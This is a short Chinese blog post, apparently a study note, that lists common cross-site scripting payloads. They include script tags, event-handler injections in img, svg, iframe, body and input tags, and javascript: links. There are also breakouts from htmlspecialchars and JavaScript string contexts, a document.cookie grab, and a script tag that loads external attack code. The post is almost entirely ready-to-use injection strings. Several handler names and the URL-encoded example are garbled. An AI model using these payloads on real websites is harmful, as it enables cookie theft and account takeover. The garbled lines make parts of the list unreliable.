xss之常见payload

payload-有效载荷:

<script>alert(1)</script>                 #最普通的xss
<script>alert(document.cookie)</script>   #获取cookie
<a href="javascript:alert('xss')">xss</a> #a链接的xss
<script src='http://baidu.com/xss.js'></script>   # 外部攻击代码
<img src=x one rror=alert(1)>              #加载图形失败执行
<iframe onl oad=alert('xss')>              #框架
<svg onl oad=alert(1)>
<video onl oadstart=alert(1) src="/media/hack-the-planet.mp4" />
<body onl oad=alert(1)>
<style onl oad=alert(1)></style>
<input onm ouseover=alert(1)>              (简单防绕过)
#' onclick="alert(111)">                  (使用DOM型的xss)

xss之htmlspecialchars方法:
1) ' onclick='alert(111)'  
2) ' onm ouseover='alert(1)
3) ' onm ouseover='javascript:alert(1)'

xss之href输出:(输入的参数在herf标签中,可以使用javascript协议来执行js)
javascript:alert(1)

xss之js输出
lili'</script><script>alert("xss")</script>

对于GET和POST 方式的,随便输入,检查在标签<p>中,就可以直接用简单的payload进行注入,如:
<script>alert(1)</script>  
<input onm ouseover=alert(1)>  
<body onl oad=alert(1)>

URL编码:
"onmouseover="61leralertt(11)      %22onmouseover%3D%2261leralertt(11)

上一篇:关于console.log()与alert()之间的藕断丝连


下一篇:03-----JS基础-----JS编写位置